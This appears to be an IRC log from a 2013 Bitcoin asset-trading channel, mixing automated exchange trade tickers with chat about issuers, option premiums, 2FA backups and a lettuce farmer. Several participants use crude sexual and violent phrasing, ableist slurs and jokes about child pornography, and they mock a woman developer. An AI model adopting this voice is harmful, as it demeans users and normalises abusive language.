Jul 16 22:07:40 [BTCTC] [AMC-PT] 200 @ 0.002499 = 0.4998 BTC [+] Jul 16 22:09:15 I prefer to just check the website directly. Jul 16 22:09:17 Also Jul 16 22:09:31 !ticker btct S.DICE-PT Jul 16 22:09:32 [BTCT:S.DICE-PT] 1D: 0.002 / 0.00204 / 0.002357 (7122 shares, 14.6 BTC), 7D: 0.001997 / 0.00214 / 0.002479 (67145 shares, 143.8 BTC), 30D: 0.00155 / 0.00219 / 0.00276 (146111 shares, 320.6 BTC) Jul 16 22:12:27 [HAVELOCK] [AM100] 2 @ 0.041391 = 0.0828 BTC [-] Jul 16 22:13:07 [BTCTC] [AMC-PT] 400 @ 0.002499 = 0.9996 BTC [+] Jul 16 22:13:39 [HAVELOCK] [AM1] 1 @ 4.395 BTC [+] Jul 16 22:13:44 [HAVELOCK] [AM1] 1 @ 4.395 BTC [+] Jul 16 22:13:58 [HAVELOCK] [AM1] 2 @ 4.395 = 8.79 BTC [+] Jul 16 22:14:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.043389 = 0.8678 BTC [+] Jul 16 22:14:01 [BTCTC] [TAT.ASICMINER] 62 @ 0.04339 = 2.6902 BTC [+] Jul 16 22:14:03 [BTCTC] [TAT.ASICMINER] 50 @ 0.043395 = 2.1698 BTC [+] Jul 16 22:15:43 [BTCTC] [TAT.ASICMINER] 28 @ 0.043399 = 1.2152 BTC [+] Jul 16 22:16:12 [BTCTC] [DMS.PURCHASE] 42 @ 0.039806 = 1.6719 BTC [-] Jul 16 22:18:00 [BTCTC] [LTC-ATF.B2] 1 @ 0.0102 BTC [-] Jul 16 22:20:11 http://arstechnica.com/information-technology/2013/07/linus-torvalds-defends-his-right-to-shame-linux-kernel-developers/ Jul 16 22:20:14 Linus Torvalds defends his right to shame Linux kernel developers | Ars Technica Jul 16 22:20:15 via an anon admirer. Jul 16 22:20:17 hai guys Jul 16 22:20:25 just noticed the hilight :) Jul 16 22:20:40 not much to say, really Jul 16 22:20:58 I'm not a manager, don't know what I'm doing, do have the 1300 coins, and don't run fractional reserve - guess that's all? Jul 16 22:21:53 relax eh. Jul 16 22:21:57 ? Jul 16 22:21:59 I'm relaxed Jul 16 22:22:01 you'll get a lot more beatings on the way. Jul 16 22:22:02 just responding Jul 16 22:22:24 still depressed ? Jul 16 22:22:32 nah, feeling better Jul 16 22:22:45 I liked your blog post on the nail, shoe, horse thing :) Jul 16 22:22:59 lol Jul 16 22:23:13 you write gud for a foreigner :) Jul 16 22:23:14 i'll tell you something you likely won't like to hear, but i'm doing for all the chitlins. Jul 16 22:23:43 you're a fucking masochist. when put on the spot your brain shuts down and your only criteria becomes " what would hurt the most to do ? cause that's the right thing" Jul 16 22:23:50 guess what. usually, it isn't. Jul 16 22:24:50 interesting. I don't know why I immediately went to "I'll pay for that!" Jul 16 22:25:02 could be you're right, but I don't recognise it Jul 16 22:25:40 could be wrong for all i know Jul 16 22:25:42 but it struck me. Jul 16 22:25:53 haha, i kinda applied this to email i just got to coinbr support "Oh, come on. 0.2 BTC fee (funds and assets) for cleaning up the account? Or 0.1 BTC each month? That's not fair. Can I withdraw all for 0.1?" Jul 16 22:25:57 there's something wrong-headed about it for sure Jul 16 22:26:10 my reply "you know what, havelock asks 1BTC for this. so stfu." Jul 16 22:26:31 [BTCTC] [TAT.ASICMINER] 15 @ 0.042691 = 0.6404 BTC [-] Jul 16 22:27:17 jurov next time go "fu, im keeping the .1" Jul 16 22:27:54 and hit his acct for .1 Jul 16 22:28:49 lol "fee for stupid questions" Jul 16 22:30:11 d34th darkee davos daybyter DiabloD3 Dimsler dooglus dub Jul 16 22:30:11 d34th darkee davos daybyter DiabloD3 Dimsler dooglus dub Jul 16 22:30:45 [BTCTC] [S.DICE-PT] 8 @ 0.002357 = 0.0189 BTC [+] Jul 16 22:32:28 [BTCTC] [DMS.MINING] 50 @ 0.0157 = 0.785 BTC [+] Jul 16 22:36:19 mjr_ https://twitter.com/Mircea_Popescu/status/357222131991445504 Jul 16 22:36:20 i halped. Jul 16 22:38:06 i suggest monetizing any action that's a pain in the ass Jul 16 22:38:35 it discourages users and encourages admins alike Jul 16 22:39:07 [BTCTC] [LTC-ATF.B2] 22 @ 0.010443 = 0.2297 BTC [+] Jul 16 22:40:04 [BTCTC] [BASIC-MINING] 1 @ 0.65999 BTC [-] Jul 16 22:40:05 [BTCTC] [BASIC-MINING] 1 @ 0.659999 BTC [+] Jul 16 22:40:07 [BTCTC] [BASIC-MINING] 1 @ 0.66 BTC [+] Jul 16 22:40:08 [BTCTC] [BASIC-MINING] 1 @ 0.669 BTC [+] Jul 16 22:40:13 [BTCTC] [BASIC-MINING] 1 @ 0.674998 BTC [+] Jul 16 22:41:31 [BTCTC] [TAT.VIRTUALMINE] 34 @ 0.004407 = 0.1498 BTC [+] Jul 16 22:43:21 lol i remembered when i had a job... got two students to work on my project Jul 16 22:43:32 that ended by emails with red letters :D Jul 16 22:44:16 i'm not inclined to profanity, but they must have been scary anyway Jul 16 22:48:23 [BTCTC] [ASICMINER-PT] 7 @ 4.4 = 30.8 BTC [+] Jul 16 22:49:23 [MPEX] [S.MPOE] 7500 @ 0.00092068 = 6.9051 BTC [-] Jul 16 22:50:07 [HAVELOCK] [AM100] 20 @ 0.04139 = 0.8278 BTC [-] Jul 16 22:50:25 [HAVELOCK] [AM100] 15 @ 0.041391 = 0.6209 BTC [+] Jul 16 22:54:51 [HAVELOCK] [AM100] 5 @ 0.041101 = 0.2055 BTC [-] Jul 16 22:56:13 [BTCTC] [AMC-PT] 1 @ 0.002499 BTC [+] Jul 16 23:02:07 [BTCTC] [AMC-PT] 100 @ 0.002499 = 0.2499 BTC [+] Jul 16 23:04:08 [MPEX] [S.MPOE] 421 @ 0.00092068 = 0.3876 BTC [-] Jul 16 23:04:17 [MPEX] [S.MPOE] 3979 @ 0.00092279 = 3.6718 BTC [+] Jul 16 23:04:19 [MPEX] [S.MPOE] 100 @ 0.00092289 = 0.0923 BTC [+] Jul 16 23:04:33 [HAVELOCK] [AM100] 26 @ 0.0411 = 1.0686 BTC [-] Jul 16 23:05:18 [HAVELOCK] [AM100] 1 @ 0.04051 BTC [-] Jul 16 23:05:19 [HAVELOCK] [AM100] 1 @ 0.0405 BTC [-] Jul 16 23:05:20 [HAVELOCK] [AM100] 10 @ 0.040305 = 0.4031 BTC [-] Jul 16 23:05:21 [HAVELOCK] [AM100] 5 @ 0.0403 = 0.2015 BTC [-] Jul 16 23:05:22 [HAVELOCK] [AM100] 2 @ 0.04025301 = 0.0805 BTC [-] Jul 16 23:05:24 [HAVELOCK] [AM100] 15 @ 0.040252 = 0.6038 BTC [-] Jul 16 23:05:25 [HAVELOCK] [AM100] 10 @ 0.0402222 = 0.4022 BTC [-] Jul 16 23:05:26 [HAVELOCK] [AM100] 10 @ 0.040202 = 0.402 BTC [-] Jul 16 23:05:27 [HAVELOCK] [AM100] 69 @ 0.040201 = 2.7739 BTC [-] Jul 16 23:05:52 [HAVELOCK] [AM100] 10 @ 0.041391 = 0.4139 BTC [+] Jul 16 23:08:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004402 BTC [-] Jul 16 23:09:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004403 = 0.044 BTC [+] Jul 16 23:10:55 they said they will implement sexcoin derivatives Jul 16 23:11:17 so you can go long with leverage Jul 16 23:14:57 what's better, porncoin or sexcoin? Jul 16 23:15:12 maybe I should create pizzacoin Jul 16 23:15:24 [MPEX] [S.MPOE] 1992 @ 0.00092289 = 1.8384 BTC [+] Jul 16 23:15:25 [MPEX] [S.MPOE] 7163 @ 0.0009249 = 6.6251 BTC [+] Jul 16 23:15:28 aiming for 1 PZC = 10000 BTC obviously Jul 16 23:15:29 sexcoin sounds better Jul 16 23:15:31 go visit the altcoin forum there's like 10 new ones every day Jul 16 23:15:31 buttcoin uber alles Jul 16 23:18:08 sooo, what did i miss Jul 16 23:20:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004403 BTC [+] Jul 16 23:20:05 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004404 = 0.0088 BTC [+] Jul 16 23:21:51 [MPEX] [S.MPOE] 1550 @ 0.0009249 = 1.4336 BTC [+] Jul 16 23:21:54 bfl shipping in 4-6 weeks Jul 16 23:24:04 stop spreading fud Jul 16 23:24:08 and pedaling child porn. Jul 16 23:27:19 did MPOE make a good anouncement or something? They seem to be going up again? Jul 16 23:27:45 for dub troller http://www.youtube.com/watch?v=3RFpVzevVL8 Jul 16 23:29:50 PeterL_: there's a chinese investor Jul 16 23:31:51 what's a chinese investor? Is that a euphemism for something, or is it just a guy from China buying the stock? Jul 16 23:32:28 chinese is euphemism for chinese Jul 16 23:32:41 fo realz Jul 16 23:33:05 http://www.news-sentinel.com/apps/pbcs.dll/article?AID=/20130716/BUSINESS/307169999/0/SEARCH Jul 16 23:33:09 Currencies – and scams – rest on confidence Jul 16 23:33:20 PeterL_ not afaik. Jul 16 23:33:42 There's a lot of chinese buying BTC stocks, it seems. Jul 16 23:33:42 " So, as one thoughtful analyst in my office noted, “Bitcoin is a schadenfreude-generating machine fueled by libertarian tears and child pornography.”" Jul 16 23:34:06 Namworld they got all this btc from mining Jul 16 23:34:07 i think he missed drugs Jul 16 23:34:21 libertarian tears ?! Jul 16 23:34:34 best i can see it's the socialist goons doing all the crying. Jul 16 23:34:47 "The second great monetary fiasco is something called Bitcoin, the computer-generated Internet currency that has captured popular imagination. Bitcoins are currently made available in a fairly constant stream using an encryption technique that replicates some of the inconvenience of mining gold. " Jul 16 23:35:17 [BTCTC] [DMS.MINING] 10 @ 0.0151 = 0.151 BTC [-] Jul 16 23:35:20 Ignorance Buffet, an all american tradition. Jul 16 23:35:47 [BTCTC] [DMS.MINING] 5 @ 0.015 = 0.075 BTC [-] Jul 16 23:35:49 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 16 23:36:58 [BTCTC] [DMS.MINING] 19 @ 0.0145 = 0.2755 BTC [-] Jul 16 23:37:10 Bitcoin mine collapses, thousands feared dead Jul 16 23:39:00 some AM investor wisdom "we don't have to raise the price, we just have to maximize profit. Supply shortages means that we are failing to do that. So either we raise the price, or we increase supply. " Jul 16 23:39:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.04339 = 0.0868 BTC [+] Jul 16 23:39:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.043395 = 0.217 BTC [+] Jul 16 23:39:23 [BTCTC] [TAT.ASICMINER] 20 @ 0.0434 = 0.868 BTC [+] Jul 16 23:39:25 [BTCTC] [TAT.ASICMINER] 22 @ 0.0434 = 0.9548 BTC [+] Jul 16 23:39:27 [BTCTC] [TAT.ASICMINER] 21 @ 0.0435 = 0.9135 BTC [+] Jul 16 23:40:30 [HAVELOCK] [AM100] 1 @ 0.04119999 BTC [-] Jul 16 23:41:21 [HAVELOCK] [AM100] 10 @ 0.0412 = 0.412 BTC [+] Jul 16 23:41:39 [HAVELOCK] [AM100] 1 @ 0.04132 BTC [+] Jul 16 23:41:40 I remember my first white girl Jul 16 23:41:52 did you maximize her cuntflap ? Jul 16 23:42:10 or did you fall short like our friendly internet miner folk Jul 16 23:42:18 I recall a hydroponic lettuce farmer on Dragon's Den being denied funding because he would always be selling out of his product Jul 16 23:42:21 >fall short Jul 16 23:42:24 I see what you did thar Jul 16 23:42:40 nubbins`: what? Jul 16 23:42:59 I mean for one Jul 16 23:43:01 if hes always selling out Jul 16 23:43:03 I got sand in it Jul 16 23:43:03 time to raise prices Jul 16 23:43:10 yeah, they argued that his prices were too low. guy had the marked on fresh local lettuce cornered for 9 months of the year, and he walked away empty handed Jul 16 23:43:23 what's "Denied funding" ? Jul 16 23:43:29 why the fuck would he need funding if he owned the market. Jul 16 23:43:36 nubbins`: WHAT A NOOB Jul 16 23:43:44 mircea_popescu: exactly! Jul 16 23:43:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004301 BTC [-] Jul 16 23:43:52 he should have been able to rape wallets everywhere Jul 16 23:43:57 and maybe even explode a few ovaries Jul 16 23:44:03 [HAVELOCK] [SDSTM] 20 @ 0.011 = 0.22 BTC [+] Jul 16 23:44:08 that happened to me and it's not nice. Jul 16 23:44:14 [HAVELOCK] [SDSTM] 10 @ 0.0115 = 0.115 BTC [+] Jul 16 23:44:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004301 BTC [-] Jul 16 23:45:05 he wanted to renovate his ratty warehouse/grow-op. guess he wasn't good at saving money Jul 16 23:45:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004301 BTC [-] Jul 16 23:45:29 its kinda completely different Jul 16 23:45:33 [BTCTC] [B.YABMC] 1 @ 0.002979 BTC [-] Jul 16 23:45:46 [BTCTC] [AMC-PT] 1 @ 0.002499 BTC [+] Jul 16 23:45:57 one has a unique product that people will chew off their fingers to get hold of Jul 16 23:46:23 [BTCTC] [AMC-PT] 95 @ 0.002499 = 0.2374 BTC [+] Jul 16 23:46:26 a lettuce farmer needs to have stock at all times Jul 16 23:46:42 dub: well yes/no Jul 16 23:46:45 if he cant increase stock Jul 16 23:46:47 he can increase price Jul 16 23:46:47 i dunno that i ever purposefully bought lettuce Jul 16 23:46:51 yes/yes Jul 16 23:46:57 DiabloD3: no Jul 16 23:46:59 dub: its hydroponics Jul 16 23:47:04 I assume he ran out of room for trays Jul 16 23:47:06 i think his business was more geared towards wholesale Jul 16 23:47:21 you know what I would have done though? Jul 16 23:47:26 used DC racks Jul 16 23:47:29 yes i know what you;'d have done Jul 16 23:47:30 anyway, "who the fuck wants to buy lettuce from a wholesaler who keeps running out?" is what it boiled down to Jul 16 23:47:32 you;'d have made a powerplant Jul 16 23:47:35 for the lettuce Jul 16 23:47:36 all solar. Jul 16 23:47:38 ahaha Jul 16 23:47:45 mircea_popescu: to be honest, I could have charged even more if I did that Jul 16 23:47:46 there are many other places i can get lettuce Jul 16 23:47:54 SOLAR POWERED HYDROPONIC LETTUCE Jul 16 23:47:55 and exchanged lettuce for spinach at unfavorable rates Jul 16 23:48:06 tree huggers everywhere would have came instantly Jul 16 23:48:06 I will buy from someone with a guaranteed supply Jul 16 23:48:16 ya but then they'd discover tjhe spinach was grown in like a chinese waste dump Jul 16 23:48:17 dub: but not hydroponic lettuce Jul 16 23:48:19 not some idiot that can't fill every other order I make Jul 16 23:48:19 and was full of uranium Jul 16 23:48:23 4.30 btc/leaf Jul 16 23:48:26 DiabloD3: all lettuce is hydro Jul 16 23:48:33 dub: no Jul 16 23:48:45 yes Jul 16 23:48:46 they still grow it the old school way in the ground Jul 16 23:48:56 not in any volume Jul 16 23:49:05 only hippie organic shit Jul 16 23:49:15 even then it will be bat shit in a solution Jul 16 23:49:25 lettuce is killin errybody yo Jul 16 23:49:28 occasionally fish shit Jul 16 23:49:29 cray cray Jul 16 23:49:44 [BTCTC] [BITVPS] 2 @ 0.00175 = 0.0035 BTC [-] Jul 16 23:49:50 aquaponics is some cool shit Jul 16 23:49:56 I want to get in on that Jul 16 23:50:02 yeah Jul 16 23:50:07 maybe I should not care about computers Jul 16 23:50:16 anyway, as luck would have it, the guy was from my city. last i checked, he rented half his warehouse out to a laundromat operation, and used the waste heat from the dryers to heat his grow space Jul 16 23:50:17 and start growing products for the paleo community Jul 16 23:50:21 and ge tthem turned on to bitcoin Jul 16 23:50:23 i know how to grow plants in water Jul 16 23:50:31 nubbins`: thats clever Jul 16 23:50:31 not sure if appropriate convo Jul 16 23:50:40 nubbins`: but he'd need to massively filter the air if hes letting it into the space Jul 16 23:50:46 if hes just heating copper piping, thats fine Jul 16 23:50:54 aquaponics is growing veg and fish at the same time Jul 16 23:51:07 and the waste air exits the building without entering his grow space Jul 16 23:51:07 oooohhhh Jul 16 23:51:17 yeah, i think it's an indirect exchange. there are vents on the outside of the building with huge piles of white lint on the ground beneath them Jul 16 23:51:19 [BTCTC] [BMF] 50 @ 0.036 = 1.8 BTC [+] Jul 16 23:51:26 you'd give the lettuce pickers cotton lung Jul 16 23:51:54 DiabloD3: I has the jesus idea around that btw Jul 16 23:52:05 need to actually execute this shit Jul 16 23:52:31 nubbins`: good Jul 16 23:53:27 eh fish. just dump in some NPK. Jul 16 23:53:39 fish are tasty Jul 16 23:54:08 fish are fishy Jul 16 23:54:23 only if you fuck them up Jul 16 23:55:58 Suspected AMC Sock: "Is there any plan to implement a primary and a secondary market (within BTCT.co)? As it stands if a company releases an IPO, speculators can undercut the offering leaving the company high and dry with no funding. Havelock has a system for this, are there any plans in the works for something similar?" Jul 16 23:56:36 [MPEX] [S.MPOE] 6887 @ 0.0009249 = 6.3698 BTC [+] Jul 16 23:56:44 [MPEX] [S.MPOE] 3332 @ 0.00092507 = 3.0823 BTC [+] Jul 16 23:56:46 [MPEX] [S.MPOE] 7381 @ 0.00092545 = 6.8307 BTC [+] Jul 16 23:58:26 [BTCTC] [ASICMINER-PT] 1 @ 4.396999 BTC [-] Jul 16 23:59:36 fuck Jul 16 23:59:53 I should really ragequit this job Jul 17 00:01:19 these are things I'm working on Jul 17 00:01:20 job .. aint that just over broke? Jul 17 00:01:22 [HAVELOCK] [SDSTM] 10 @ 0.01199999 = 0.12 BTC [+] Jul 17 00:01:45 :p Jul 17 00:02:41 that's pretty retarded. Jul 17 00:02:56 remarkably, it was being the main point of discussing on glbse Jul 17 00:03:07 "asset" "issuers" upset that people undersold their worthless crap Jul 17 00:03:55 well the retardation folds on itself when you consider that AMC isn't even an IPO Jul 17 00:04:08 it's like their 4th offering, BTCT Jul 17 00:04:59 heh, you'd need to fork folding@home to make sense of that Jul 17 00:05:15 his next move will be to remove the walls at 25 that he promised not to move and were justifiable Jul 17 00:06:26 who is this guy anyway Jul 17 00:06:31 stupid question, if you lose your iphone and you restore a new one with your backup, what happend to google 2FA ?? every token are in ? Jul 17 00:06:35 idiots need a way to throw money at scammers bro Jul 17 00:06:49 the quote is Arctic Wolf Jul 17 00:06:56 error47311 prolly the person finding it could use it like you used it Jul 17 00:06:57 a guy that loves AMC Jul 17 00:06:59 if they knew where Jul 17 00:07:07 https://bitcointalk.org/index.php?topic=125629.msg2743847#msg2743847 Jul 17 00:07:10 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Jul 17 00:07:20 [BTCTC] [DMS.SELLING] 10 @ 0.0248 = 0.248 BTC [+] Jul 17 00:07:45 finding assets to invest in isn't easy Jul 17 00:07:59 sure it is. you just go "hi guise what are you all doing" Jul 17 00:08:07 heh, +1 Jul 17 00:08:08 and if you announce you are looking to invest Jul 17 00:08:15 you become a scammer direct target Jul 17 00:08:43 the 3 "other" exchanges get a steady flow if inquiries Jul 17 00:08:55 but as you can see by what gets released, no real businesses Jul 17 00:09:04 well business is hard. Jul 17 00:09:13 harder than math, even Jul 17 00:09:21 and unfair to women and sarah sharp Jul 17 00:09:21 mircea_popesc : dont care if some1 found it, still need all my password. But me, if i lose it and buy a new ! do i still have my token for all my wallet in my backup Jul 17 00:09:37 error47311 i imagine you do, yes. Jul 17 00:09:44 [BTCTC] [DMS.PURCHASE] 189 @ 0.039806 = 7.5233 BTC [-] Jul 17 00:09:49 i never used a smartphone myself so perhaps not thge best person to say Jul 17 00:09:58 protip: back up your phone Jul 17 00:10:02 i do Jul 17 00:10:05 [HAVELOCK] [AM100] 4 @ 0.04132 = 0.1653 BTC [+] Jul 17 00:10:07 [HAVELOCK] [AM100] 1 @ 0.044 BTC [+] Jul 17 00:10:10 actually, brb, backing up phone (wtf!) Jul 17 00:10:32 but 2FA is a special case, dunno if all token are in the backup or not... Jul 17 00:10:44 i'd hope so, seems rather house-of-cardish otherwise Jul 17 00:11:35 that sounds like a whole financial ecosystem, gtfo Jul 17 00:13:03 dude i have stalkers on twitter Jul 17 00:13:11 no matter what i say there's a bunch of retweets Jul 17 00:13:29 i mean my tweet about the linux idiot woman ?! mostly women retweeted it. wtf. Jul 17 00:13:31 You should have fun with that then Jul 17 00:13:43 "Passionate writer, photographer and traveller. Social Media enthusiast. Positive is how I Live." Jul 17 00:13:52 and she rts that one ?! Jul 17 00:14:02 [BTCTC] [TAT.ASICMINER] 41 @ 0.043435 = 1.7808 BTC [-] Jul 17 00:14:06 the phrase 'social media enthusiast' makes me weep for the future Jul 17 00:14:25 ikr Jul 17 00:14:31 [HAVELOCK] [HIM] 3 @ 0.2996 = 0.8988 BTC [-] Jul 17 00:14:37 since when is "an enthusiast" something to be Jul 17 00:14:43 just go "retard" and be done with it. Jul 17 00:14:54 "joe's a teacher, mary's a whore and i'm a retard" Jul 17 00:15:20 in fact, that entire bio is basically just a list of facebook widgets Jul 17 00:15:48 [HAVELOCK] [KCIM] 2 @ 0.9 = 1.8 BTC [+] Jul 17 00:16:19 [BTCTC] [COGNITIVE] 3 @ 0.867973 = 2.6039 BTC [+] Jul 17 00:16:35 mjr_ pm fyi Jul 17 00:16:41 [BTCTC] [COGNITIVE] 1 @ 0.867 BTC [-] Jul 17 00:16:50 [HAVELOCK] [AM100] 24 @ 0.04139 = 0.9934 BTC [-] Jul 17 00:17:10 [HAVELOCK] [AM100] 4 @ 0.04139 = 0.1656 BTC [-] Jul 17 00:18:00 [HAVELOCK] [AM100] 48 @ 0.041391 = 1.9868 BTC [+] Jul 17 00:19:22 [HAVELOCK] [AM1] 1 @ 4.36 BTC [-] Jul 17 00:20:00 [HAVELOCK] [AM100] 80 @ 0.041391 = 3.3113 BTC [+] Jul 17 00:20:19 [HAVELOCK] [AM100] 10 @ 0.041391 = 0.4139 BTC [+] Jul 17 00:20:39 [HAVELOCK] [AM100] 5 @ 0.041391 = 0.207 BTC [+] Jul 17 00:20:47 [HAVELOCK] [AM100] 2 @ 0.041391 = 0.0828 BTC [+] Jul 17 00:22:39 [BTCTC] [COGNITIVE] 1 @ 0.867974 BTC [+] Jul 17 00:24:49 oh my, what do i find here, again. from lettuce growing op thru amc retardation to social media enthusiasts Jul 17 00:25:09 nothing about assets Jul 17 00:27:05 [HAVELOCK] [HIM] 1 @ 0.2996 BTC [-] Jul 17 00:27:49 [BTCTC] [AMC-PT] 150 @ 0.002496 = 0.3744 BTC [-] Jul 17 00:28:53 [MPEX] [S.MPOE] 637 @ 0.00092545 = 0.5895 BTC [+] Jul 17 00:28:55 [MPEX] [S.MPOE] 2463 @ 0.00092666 = 2.2824 BTC [+] Jul 17 00:30:25 [BTCTC] [BASIC-MINING] 3 @ 0.65 = 1.95 BTC [-] Jul 17 00:30:47 [BTCTC] [COGNITIVE] 1 @ 0.867499 BTC [-] Jul 17 00:30:49 [BTCTC] [COGNITIVE] 1 @ 0.8675 BTC [+] Jul 17 00:31:54 [BTCTC] [COGNITIVE] 1 @ 0.8675 BTC [+] Jul 17 00:32:09 [BTCTC] [COGNITIVE] 1 @ 0.867978 BTC [+] Jul 17 00:32:32 [BTCTC] [COGNITIVE] 4 @ 0.868 = 3.472 BTC [+] Jul 17 00:32:43 is a premium of 0.021 fair for a basic-miner call option with 18 days lifetime and a strike of 1? Jul 17 00:32:54 [BTCTC] [COGNITIVE] 1 @ 0.87 BTC [+] Jul 17 00:32:56 [BTCTC] [COGNITIVE] 1 @ 0.87 BTC [+] Jul 17 00:33:15 [BTCTC] [COGNITIVE] 1 @ 0.879999 BTC [+] Jul 17 00:33:44 [BTCTC] [COGNITIVE] 1 @ 0.88 BTC [+] Jul 17 00:34:45 a call can't sell for less than current value Jul 17 00:34:53 that's about 3.3 for strike of 1. Jul 17 00:35:27 What? Jul 17 00:36:07 what's fair is of no concern Jul 17 00:36:42 two factors: what someone will pay, and what you are willing to sell fo Jul 17 00:36:43 r Jul 17 00:36:58 [BTCTC] [DMS.MINING] 1 @ 0.01568 BTC [+] Jul 17 00:37:10 really, what you are willing to sell for is all that matters with an option Jul 17 00:37:22 in regards to writing one Jul 17 00:37:44 sure, but it still can't sell for less than what you'd get selling the share. Jul 17 00:38:41 [BTCTC] [AMC-PT] 2 @ 0.002499 = 0.005 BTC [+] Jul 17 00:38:44 do people even buy basic-mining options? Jul 17 00:38:45 those options are out there Jul 17 00:38:48 Yeah calls sell for less than selling the shares. Jul 17 00:39:02 They also have a strike. People pay the strike at execution. Jul 17 00:39:21 They only have to pay the premium upfront. Jul 17 00:39:39 maybe, marginally so. Jul 17 00:39:52 not 0.02 on 1 strike when underlying is trading 4. Jul 17 00:40:02 2.9x or w/e Jul 17 00:40:11 basic is trading @0.6x Jul 17 00:40:18 not 4 Jul 17 00:41:44 i'm asking, because my first intention was: a premium of 0.021 is almost nothing.. but i have not really a reference besides other options to compare this Jul 17 00:42:15 i'm going to look into schoeles, but tbh this looks complicated, so i'd like to know, if there is some rule of thumb Jul 17 00:43:38 [BTCTC] [AMC-PT] 8 @ 0.002499 = 0.02 BTC [+] Jul 17 00:47:42 options Jul 17 00:47:44 complicated Jul 17 00:47:54 u don sy. Jul 17 00:48:03 nicofrobeen o i thought am Jul 17 00:48:05 sorry. Jul 17 00:48:30 rule of thumb is : (current price - strike) = minimum premium for calls Jul 17 00:48:33 [HAVELOCK] [AM100] 30 @ 0.041391 = 1.2417 BTC [+] Jul 17 00:48:33 add whatever time value. Jul 17 00:48:41 (strike - current price) for puts Jul 17 00:48:43 add same. Jul 17 00:51:11 well yeah, that's the minimum for calls Jul 17 00:51:14 ty Jul 17 00:53:22 well well :) http://www.money-zine.com/calculators/investment-calculators/black-scholes-calculator/ if anyone is interested.. not that complicated at all Jul 17 00:56:56 [HAVELOCK] [AM100] 41 @ 0.041391 = 1.697 BTC [+] Jul 17 00:58:32 [BTCTC] [LTC-ATF.B2] 9 @ 0.010443 = 0.094 BTC [+] Jul 17 01:03:02 [BTCTC] [DMS.PURCHASE] 5 @ 0.039806 = 0.199 BTC [-] Jul 17 01:05:29 [MPEX] [S.MPOE] 4700 @ 0.00092274 = 4.3369 BTC [-] Jul 17 01:05:39 [HAVELOCK] [SDSTM] 10 @ 0.0104 = 0.104 BTC [-] Jul 17 01:05:48 [HAVELOCK] [SDSTM] 10 @ 0.01 = 0.1 BTC [-] Jul 17 01:06:14 [MPEX] [S.MPOE] 1510 @ 0.00092274 = 1.3933 BTC [-] Jul 17 01:06:29 thanks mjr_.. i give it a try in the next minutes Jul 17 01:06:43 but i see one problem right now Jul 17 01:06:55 you could calc the vola for the last day Jul 17 01:06:57 or the last month Jul 17 01:06:59 or ... Jul 17 01:07:12 whats up mjr Jul 17 01:07:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.043435 = 0.1737 BTC [-] Jul 17 01:07:19 well, 'everything is first time once' Jul 17 01:07:30 [HAVELOCK] [SDSTM] 6 @ 0.01 = 0.06 BTC [-] Jul 17 01:07:59 [HAVELOCK] [AM100] 6 @ 0.04139099 = 0.2483 BTC [-] Jul 17 01:08:30 [HAVELOCK] [SDSTM] 70 @ 0.01 = 0.7 BTC [-] Jul 17 01:09:41 i'm curious :) Jul 17 01:10:07 i think Namworld has a sheet like that Jul 17 01:10:29 [HAVELOCK] [AM100] 17 @ 0.040999 = 0.697 BTC [-] Jul 17 01:10:31 [BTCTC] [AMC-PT] 3193 @ 0.002499 = 7.9793 BTC [+] Jul 17 01:11:41 [HAVELOCK] [AM100] 24 @ 0.04051 = 0.9722 BTC [-] Jul 17 01:11:42 [HAVELOCK] [AM100] 5 @ 0.0404 = 0.202 BTC [-] Jul 17 01:11:43 [HAVELOCK] [AM100] 72 @ 0.040225 = 2.8962 BTC [-] Jul 17 01:11:44 [HAVELOCK] [AM100] 400 @ 0.040223 = 16.0892 BTC [-] Jul 17 01:11:46 [HAVELOCK] [AM100] 49 @ 0.040222 = 1.9709 BTC [-] Jul 17 01:12:17 [HAVELOCK] [AM1] 5 @ 4.36 = 21.8 BTC [-] Jul 17 01:14:16 look on btcctctttfccc Jul 17 01:20:25 [HAVELOCK] [AM100] 4 @ 0.04139 = 0.1656 BTC [+] Jul 17 01:20:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.043434 = 0.1303 BTC [-] Jul 17 01:22:51 [BTCTC] [BASIC-MINING] 1 @ 0.67 BTC [+] Jul 17 01:23:00 Symbol: BASIC-MINING, Since: 17.06.2013 (30 days), N = 1611 (trades), Mean: 0.34463, Square: 0.05610, Volatility: 0.23685 << could this somehow be correct? Jul 17 01:23:29 Symbol: ASICMINER-PT, Since: 17.06.2013 (30 days), N = 5807 (trades), Mean: 2.66822, Square: 3.96705, Volatility: 1.99175 Jul 17 01:23:55 Symbol: ASICMINER-PT, Since: 10.07.2013 (7 days), N = 924 (trades), Mean: 4.30554, Square: 0.00903, Volatility: 0.09501 Jul 17 01:25:21 [BTCTC] [DMS.SELLING] 33 @ 0.0248 = 0.8184 BTC [+] Jul 17 01:25:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004398 BTC [+] Jul 17 01:28:47 hehe, I replied to the primary market guy, Jul 17 01:29:05 and his reply amounted to "well, that's like, your opinion, man" Jul 17 01:30:50 [BTCTC] [COGNITIVE] 1 @ 0.830001 BTC [-] Jul 17 01:30:55 [BTCTC] [COGNITIVE] 1 @ 0.83 BTC [-] Jul 17 01:32:29 [BTCTC] [TAT.ASICMINER] 37 @ 0.0434 = 1.6058 BTC [-] Jul 17 01:33:27 [HAVELOCK] [AM100] 37 @ 0.041388 = 1.5314 BTC [-] Jul 17 01:33:48 [BTCTC] [AMC-PT] 200 @ 0.002499 = 0.4998 BTC [+] Jul 17 01:34:00 ya man. totally. Jul 17 01:34:27 it's just like in the pseudostudies class. Jul 17 01:34:30 [BTCTC] [ASICMINER-PT] 1 @ 4.355004 BTC [-] Jul 17 01:35:01 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 17 01:35:52 [BTCTC] [DMS.SELLING] 2 @ 